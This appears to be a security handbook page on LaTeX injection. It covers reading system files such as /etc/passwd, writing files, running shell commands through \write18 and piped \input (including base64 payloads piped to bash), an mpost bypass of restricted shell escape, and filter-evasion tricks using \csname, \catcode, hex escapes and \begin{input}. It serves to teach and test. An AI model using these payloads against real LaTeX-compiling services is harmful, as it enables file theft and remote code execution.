LaTeX

A powerful language for text markup and document generation, but dangerous for user input

Basics

LaTeX is used in many different contexts, often to typeset complex expressions like formulas, but it can also create whole documents, as is common for academic research papers.

Syntax

The basic syntax of LaTeX is referencing variables and commands by prefixing their names with a \ backslash. To provide arguments to a command, surround them with {} curly braces. A full document always starts with a small amount of boilerplate defining what type of document it is and where its contents begin:

helloworld.tex
\documentclass{article}
\begin{document}
Hello, world!
\end{document}

You can define commands yourself using the \newcommand command, and use them throughout the document:

\documentclass{article}
\newcommand{\somecommand}{Hello, world!}
\begin{document}
Result: \somecommand
\end{document}

Result: Hello, world!

Use \renewcommand instead if the command already exists; it overwrites the existing definition.
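The following small sketch combines both points. It defines a command that takes one argument (referenced as #1 in its body, a feature the Repeating section also relies on) and then redefines an existing command. The \greet name is made up for this example:

```latex
\documentclass{article}
% A command taking one argument, referenced as #1 in the body
\newcommand{\greet}[1]{Hello, #1!}
\newcommand{\somecommand}{Hello, world!}
% \somecommand already exists, so \newcommand would raise an error here;
% \renewcommand replaces its definition instead
\renewcommand{\somecommand}{Overwritten!}
\begin{document}
\greet{reader} \somecommand
\end{document}
```

Result: Hello, reader! Overwritten!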

Compiling

A .tex file commonly gets compiled into a .pdf file for publishing, which is as easy as running the pdflatex command on the file:

file.tex
\documentclass{standalone}
\begin{document}
Hello, world!
\end{document}
$ pdflatex file.tex
...
Output written on file.pdf (1 page, 9784 bytes)

During this compilation, all the code in the source file is executed to generate the resulting PDF. As we will explore in the Exploitation (Injection) section, some commands are dangerous. Whether the compiler allows a document to run them depends on a few command-line flags, each setting a different level of restriction:

  1. --shell-escape: Enable \write18 completely, allowing arbitrary shell commands

  2. --shell-restricted: Enable \write18, but only certain predefined 'safe' commands (default)

  3. --no-shell-escape: Disable \write18 completely
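You can check which of these levels a compiler is actually running with. pdfTeX exposes the read-only \pdfshellescape integer (0 = disabled, 1 = enabled, 2 = restricted). The minimal sketch below assumes the document is compiled with pdflatex; other engines such as LuaTeX may not provide this primitive under the same name:

```latex
\documentclass{article}
\begin{document}
% \pdfshellescape is a pdfTeX primitive: 0, 1 or 2 depending on the flags
Shell escape:
\ifcase\pdfshellescape
  disabled%   0: --no-shell-escape
\or
  enabled%    1: --shell-escape
\or
  restricted% 2: --shell-restricted (the usual default)
\fi
\end{document}
```

On a default installation, running pdflatex file.tex on this should print "Shell escape: restricted".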

Exploitation (Injection)

LaTeX is very powerful and can do almost anything: from reading files to include in the document, to writing files and even executing system commands directly. Because of this, running user-provided code with LaTeX is always dangerous. Filter-based protection is also hard to implement because of the complexity of the language and the many ways to bypass it.

Contexts

There are a few special contexts where you may be able to inject. Depending on the context, you may or may not be able to use certain commands, so it is important to understand how they work.

Preamble

One useful command is \usepackage, which imports LaTeX packages with extra functionality. It can only be used before \begin{document}, in the so-called "preamble". Using it afterwards results in an error message ("Can be used only in preamble"). For example:

Error
\documentclass{article}
\begin{document}
\usepackage{eurosym}
\euro{13.37}
\end{document}
Success
\documentclass{article}
\usepackage{eurosym}
\begin{document}
\euro{13.37}
\end{document}

If your injection point is after \begin{document}, you will not be able to import new packages and will have to make do with the ones already imported.
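To find out which imported packages you can use from the document body, one option is to test whether a command they define exists. The e-TeX \ifdefined primitive (available in pdflatex) does this. The sketch below uses \lstinputlisting, \verbatiminput and \url, from packages mentioned elsewhere on this page, as example probes:

```latex
% Probe for commands defined by packages that may already be loaded;
% the space after each probed command name is skipped by TeX
\ifdefined\lstinputlisting listings: loaded\else listings: missing\fi

\ifdefined\verbatiminput verbatim: loaded\else verbatim: missing\fi

\ifdefined\url url/hyperref: loaded\else url/hyperref: missing\fi
```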

Formulas (math mode)

By surrounding text with $ signs, it becomes a formula in LaTeX (math mode). Formulas look slightly different and follow different rules, so some commands do not work inside them. One example I could find is the \url{} command from the hyperref package:

Error
\documentclass{article}
\usepackage{hyperref}
\begin{document}
$\url{https://book.jorianwoltjer.com/}$
\end{document}

This gives a vague error, "LaTeX Error: Command $ invalid in math mode", which can be fixed by escaping from the formula. Close it with a $ in your input, perform the commands you want, and then open a new formula with another $ so that the template's closing $ still has a match:

Success
\documentclass{article}
\usepackage{hyperref}
\begin{document}
$a$\url{https://book.jorianwoltjer.com/}$b$
\end{document}

File read

Let's start exploiting. Without any special flags, LaTeX can read system files and include them in the output in a few different ways. One simple way is \input, which reads the specified file and runs it as more LaTeX code:

\input{/etc/passwd}

Another similar command is \include. The difference is that it can only include .tex files, and the .tex extension is added automatically:

\include{secret}  % includes secret.tex

Both of the above methods include the content as LaTeX code, meaning special characters such as _, #, $ or % may break the syntax. You may be able to fix parts of this by injecting setup code before the include (such as the \catcode trick shown below). However, some packages provide cleaner ways that are designed to include raw data.

If the listings package is loaded, you have access to the \lstinputlisting command. It reads the file given as its argument and prints it as a code listing, without interpreting it as LaTeX:

\usepackage{listings}
...
\lstinputlisting{/etc/passwd}
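Long lines, such as those in /etc/passwd, may run off the page in a listing. This sketch uses the listings options breaklines (wrap long lines) and firstline/lastline (print only a range of lines). The range 1 to 20 is an arbitrary example:

```latex
\documentclass{article}
\usepackage{listings}
\begin{document}
% breaklines=true wraps long lines instead of letting them run off the page;
% firstline/lastline print only lines 1 to 20 of the file
\lstinputlisting[breaklines=true,firstline=1,lastline=20]{/etc/passwd}
\end{document}
```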

Similarly, the verbatim package provides \verbatiminput, which includes a file's text literally:

\usepackage{verbatim}
...
\verbatiminput{/etc/passwd}

A more manual way (without packages) is opening a file and reading its lines:

\newread\file       % define \file variable
\openin\file=/etc/passwd  % open file into variable
\loop\unless\ifeof\file   % keep reading until EOF
    \read\file to\line    % read to \line variable
    \line       % print \line variable
\repeat
\closein\file

This method also executes the content as LaTeX, meaning special characters like _ underscores may generate errors. We can patch the characters we run into using \catcode, which changes the category of a character. Category 12 ("other") makes it a literal character:

\catcode`\_=12  % Print '_' characters literally in the future
\newread\file
...
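The fuller sketch below combines this with the reading loop above. It makes several common special characters literal before reading, scoped inside a group so the rest of the document keeps its normal category codes. The \, { and } characters are left alone because the loop itself needs them. Loading the T1 font encoding is an added assumption, so that catcode-12 characters like _ print as themselves instead of as OT1 accent glyphs:

```latex
\documentclass{article}
\usepackage[T1]{fontenc}  % T1 renders catcode-12 _ ^ ~ as themselves, unlike OT1
\begin{document}
\begingroup
% Make common special characters literal (category 12, "other") so the
% lines read below print as text instead of raising errors. After the
% next line, % no longer starts a comment until \endgroup.
\catcode`\_=12 \catcode`\#=12 \catcode`\$=12 \catcode`\&=12 \catcode`\^=12 \catcode`\~=12 \catcode`\%=12
\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
  \read\file to\line
  \line
\repeat
\closein\file
\endgroup
\end{document}
```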

File write

Similarly to File read, you can open and write to a file:

\newwrite\file
\openout\file=file.txt      % open file.txt for writing on the \file stream
\write\file{Hello, world!}  % write the content
\closeout\file              % close the stream
A     % filler: without \immediate, these operations only run when a page is shipped out

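Depending on the backend, you may be able to write or overwrite critical files like source code or templates to achieve full Remote Code Execution. Note that with the default openout_any = p setting in texmf.cnf, TeX refuses to write to absolute paths, dotfiles, or paths containing "..". Writes are therefore normally limited to the compilation directory and its subdirectories.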
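The filler line above is only needed because \openout, \write and \closeout are normally deferred until a page is shipped out. Prefixing them with \immediate (also used with \write18 further below) performs them straight away, as in this sketch:

```latex
\documentclass{article}
\begin{document}
\newwrite\file
% \immediate runs each operation right away instead of deferring it to
% when a page is shipped out, so no filler text is needed
\immediate\openout\file=file.txt
\immediate\write\file{Hello, world!}
\immediate\closeout\file
\end{document}
```

pdflatex will report "No pages of output." for this document, but file.txt is still written.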

Command Execution (RCE)

LaTeX is so powerful that it can even execute system commands, in multiple different ways. One is the \write18 command, which takes the command you wish to execute as its argument:

\documentclass{article}
\begin{document}
\write18{id > /tmp/pwned}
A     % filler: a \write18 without \immediate only runs when a page is shipped out
\end{document}

Another, less common way is using \input with a | pipe character in front of the command, which reads the command's output as LaTeX code:

\documentclass{article}
\begin{document}
% short:
\input|id|base64
% alternative:
\input|uname${IFS}-a|base64
\input|echo${IFS}aWQgPiAvdG1wL3B3bmVk|base64${IFS}-d|bash
% simple & flexible:
\input{|"uname -a | base64"}
\end{document}

As explained in Compiling, the list of allowed commands is very restricted by default. The examples above would only execute if --shell-escape was turned on, allowing arbitrary commands.

The default allowed commands are stored in a big configuration file, /usr/share/texmf/web2c/texmf.cnf. The exact path depends on the distribution; running kpsewhich texmf.cnf prints it. This file contains two interesting settings:

texmf.cnf
% Enable system commands via \write18{...}.  When enabled fully (set to
% t), obviously insecure.  When enabled partially (set to p), only the
% commands listed in shell_escape_commands are allowed.  Although this
% is not fully secure either, it is much better, and so useful that we
% enable it for everything but bare tex.
shell_escape = p

% No spaces in this command list.
% 
% The programs listed here are as safe as any we know: they either do
% not write any output files, respect openout_any, or have hard-coded
% restrictions similar to or higher than openout_any=p.  They also have
% no features to invoke arbitrary other programs, and no known
% exploitable bugs.  All to the best of our knowledge.  They also have
% practical use for being called from TeX.
% 
shell_escape_commands = \
bibtex,bibtex8,\
extractbb,\
gregorio,\
kpsewhich,\
makeindex,\
repstopdf,\
r-mpost,\
texosquery-jre8,\

The shell_escape setting determines which of the 3 levels explained above is the default (t for enabled, p for restricted, f for disabled). In restricted mode, the shell_escape_commands variable lists the allowed commands, separated by commas. These commands should not allow you to do anything malicious, but there is a history of abusing functionality in some of these binaries to still perform interesting actions.
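Since kpsewhich is itself on the default allowlist, it may work even in restricted mode to print the settings the target compiler actually uses. This avoids guessing the location and contents of its texmf.cnf. The sketch below assumes restricted or full shell escape, and uses the unbraced \input| form shown earlier, which passes the quoted command straight to the TeX primitive:

```latex
\documentclass{article}
\begin{document}
% kpsewhich is in the default shell_escape_commands list, so these piped
% inputs are expected to run under --shell-restricted too
Mode: \input|"kpsewhich --var-value=shell_escape"

Allowed: \input|"kpsewhich --var-value=shell_escape_commands"
\end{document}
```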

If plain mpost is allowed (the default in earlier versions), the whole protection can be bypassed by injecting commands through its arguments (source). First, you need a parsable MetaPost file so the command does not crash before reaching our payload. This can be an existing file, or a file you created yourself, for example via an upload feature:

file.txt
verbatimtex
\documentclass{minimal}
\begin{document}
etex
beginfig (1)
label(btex blah etex, origin);
endfig;
\end{document}
bye

Then the following mpost arguments can execute arbitrary commands:

mpost -ini '-tex=bash -c (id)>/tmp/pwned' file.txt

The example above executes id, but more complex commands run into escaping trouble because spaces don't work. To get around this, replace each space with ${IFS} and Base64-encode the real payload (CyberChef):

mpost -ini '-tex=bash -c (base64${IFS}-d<<<aWQgPiAvdG1wL3B3bmVk|bash)' file.txt

Inside of LaTeX, it would look like this:

Method 1
\immediate\write18{mpost -ini '-tex=bash -c (base64${IFS}-d<<<aWQgPiAvdG1wL3B3bmVk|bash)' file.txt}
Method 2
\input{|"mpost -ini '-tex=bash -c (base64${IFS}-d<<<aWQgPiAvdG1wL3B3bmVk|bash)' file.txt"}

Filter Bypass

Commands

Some dangerous LaTeX commands might be blocked by a blacklist filter. Such filters are hard to get right, because there are many tricks to circumvent them with alternative methods.

The following paper explores many different ideas for attacking LaTeX files and has some tricks for evading filters (section 4.5):

If commands are blocked by matching strings like "\input", one powerful trick is \csname. It can represent a command without putting a \ directly in front of its name:

\csname input\endcsname{|"id > /tmp/pwned"}
% === equivalent to ===
\input{|"id > /tmp/pwned"}
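Because \csname expands macros until it reaches \endcsname, the command name can also be assembled from pieces, so that not even the string "input" appears literally. This sketch assumes \def itself is not filtered; the \halfA and \halfB names are hypothetical:

```latex
% \csname expands \halfA and \halfB into the characters "input",
% so this calls \input without the name appearing in the source
\def\halfA{in}
\def\halfB{put}
\csname\halfA\halfB\endcsname{|"id > /tmp/pwned"}
```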

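Another very powerful technique is using \catcode to change the meaning (category) of characters. For example, we could change the X character to mean "escape", just like \ normally does. This is another way to evade filters that look for commands prefixed with backslashes, and it can also be used to replace any other special character. The category codes are: 0 escape, 1 begin group, 2 end group, 3 math shift, 4 alignment tab, 5 end of line, 6 parameter, 7 superscript, 8 subscript, 9 ignored, 10 space, 11 letter, 12 other, 13 active, 14 comment, 15 invalid.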

\catcode`X=0                % change meaning of X to 'escape character'
Xinput{|"id > /tmp/pwned"}  % use X as an escape character to run \input
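The catcode change applies to every X read afterwards. Any later X in the surrounding template (for example in the word "XML") would turn into an escape character and likely cause errors. This sketch scopes the change to a group to avoid that:

```latex
\begingroup
\catcode`X=0                 % inside this group, X acts like a backslash
Xinput{|"id > /tmp/pwned"}   % runs \input with the piped command
\endgroup                    % X is an ordinary letter again from here on
```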

Using \makeatletter ("make @ letter"), which changes the category code of the @ character to 11 (letter), you can call LaTeX's internal variants of \input, whose names contain @:

\makeatletter               % change meaning of @ to 'letter'
\@input{|"id > /tmp/pwned"}
\@@input|"id > /tmp/pwned"
\@iinput{|"id > /tmp/pwned"}
\@input@{|"id > /tmp/pwned"}
% === \makeatletter is equivalent to ===
\catcode`\@=11

Using ^^XX hex escape sequences, you can also represent any blocked character by its hex code. If this notation itself is not blocked, you can evade practically any filter (CyberChef).

% escaped \
^^5cinput{|"id > /tmp/pwned"}
% escaped everything
^^5c^^69^^6e^^70^^75^^74^^7b^^7c^^22^^69^^64^^20^^3e^^20^^2f^^74^^6d^^70^^2f^^70^^77^^6e^^65^^64^^22^^7d
% custom character by changing category
\catcode`X=7                  % change meaning of X to 'superscript' (^)
XX5cinput{|"id > /tmp/pwned"}  % replace ^^ with XX

Lastly, \begin{name} internally calls the command \name (and \end{name} calls \endname), so any command can be invoked as if it were an environment. The argument of \begin selects the command, and the text following it is consumed as the command's argument. This trick bypasses almost any \ blacklist because it only uses the regular \begin and \end:

\begin{input}{|"id > /tmp/pwned"}\end{input}

Tip: While a single one of these techniques might not get straight through the filter, combining them makes them even more powerful. Try using one technique to set up another, obfuscating the payload against whatever detection may be in place.
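As one example of combining techniques, the \begin trick can be written with ^^XX escapes, so that neither "\begin" nor "input" appears literally in the source. This sketch assumes the ^^ notation itself is not filtered:

```latex
% ^^5c is read as a backslash, so ^^5cbegin becomes \begin; ^^70 is read
% as "p", so the environment name becomes "input" and \input gets called
^^5cbegin{in^^70ut}{|"id > /tmp/pwned"}^^5cend{in^^70ut}
```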

Repeating

A filter might try to prevent loops by blocking \repeat or similar commands, but forget that recursion is also an option. Here is a short command that loops N times. It is named \l, which already exists in LaTeX as the ł character, hence \renewcommand. The first argument is the number of iterations, and the second argument is the code to execute:

% \l{N}{code}: run code N times; the space after 0 ends the number so code cannot extend it
\renewcommand\l[2]{\ifnum#1>0 #2\l{\numexpr#1-1\relax}{#2}\fi}

For example, it can be used to read lines from a file:

\newread\file
\openin\file=/etc/passwd
\catcode`_=12
\l{10}{\read\file to\line\line}  % read and print the first 10 lines
\closein\file

To read the entire file, you can instead make EOF stop the recursion inside the command:

% define command \r to read and print a line if not EOF, and then call itself again
\renewcommand\r{\ifeof\file\else\read\file to\line\line\r\fi}
\catcode`_=12
\newread\file
\openin\file=/etc/passwd
\r  % call the read function
\closein\file
